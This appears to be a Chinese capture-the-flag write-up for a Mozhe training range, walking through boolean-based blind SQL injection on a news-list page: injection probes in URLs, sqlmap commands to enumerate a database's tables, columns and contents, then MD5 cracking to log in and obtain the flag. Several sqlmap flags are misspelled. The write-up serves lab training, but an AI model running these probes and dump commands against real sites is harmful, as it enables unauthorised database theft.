墨者学习

                                                 By/shy014

1.进入靶场环境发现后台管理页面,尝试弱口令和万能密码失败,抓包查看登陆处也没有发现注入漏洞。

02#墨者靶场-SQL注入漏洞测试(布尔盲注)

2.仔细查看该页面,发现一个新的链接,点击跳转,发现可能存在注入漏洞。

02#墨者靶场-SQL注入漏洞测试(布尔盲注)

  1. 构造如下URL进行测试,确认存在数字型SQL注入漏洞,
  1. http://219.153.49.228:41979/new_list.php?id=1,有回显
  2. http://219.153.49.228:41979/new_list.php?id=1’,无回显
  3. http://219.153.49.228:41979/new_list.php?id=1 and 1=1 ,有回显
  4. http://219.153.49.228:41979/new_list.php?id=1 and 1=2 ,无回显

3.由于没有找到回显位,所以尝试布尔型盲注入,确定它当前的数据库名长度为10位。

02#墨者靶场-SQL注入漏洞测试(布尔盲注)

4.直接使用sqlmap

python2 sqlmap.py -u 219.153.49.228:41979/new_list.php?id=1*  -techenique=B

02#墨者靶场-SQL注入漏洞测试(布尔盲注)

5.使用sqlmap读取数据库

python2 sqlmap.py -u 219.153.49.228:41979/new_list.php?id=1*  -techenique=B –dbs

02#墨者靶场-SQL注入漏洞测试(布尔盲注)

6.使用sqlmap读取当前数据库的表

python2 sqlmap.py -u 219.153.49.228:41979/new_list.php?id=1*  -techenique=B -D=stormgroup –-tables

02#墨者靶场-SQL注入漏洞测试(布尔盲注)

7.使用sqlmap读取member表中的字段

python2 sqlmap.py -u 219.153.49.228:41979/new_list.php?id=1*  -techenique=B -D stormgroup –T member –columns

02#墨者靶场-SQL注入漏洞测试(布尔盲注)

8.使用sqlmap读取表中的内容

02#墨者靶场-SQL注入漏洞测试(布尔盲注)

9.找网站解MD5

02#墨者靶场-SQL注入漏洞测试(布尔盲注)

10.登陆发现key: mozhe683168a7ed356fe184d15dc8de6

02#墨者靶场-SQL注入漏洞测试(布尔盲注)

相关文章:

  • 2022-01-19
  • 2021-12-01
  • 2022-01-21
  • 2021-07-20
  • 2022-12-23
  • 2021-07-08
  • 2021-10-01
  • 2021-06-30
猜你喜欢
  • 2021-08-16
  • 2022-01-16
  • 2021-10-20
  • 2021-08-17
  • 2021-06-08
相关资源
相似解决方案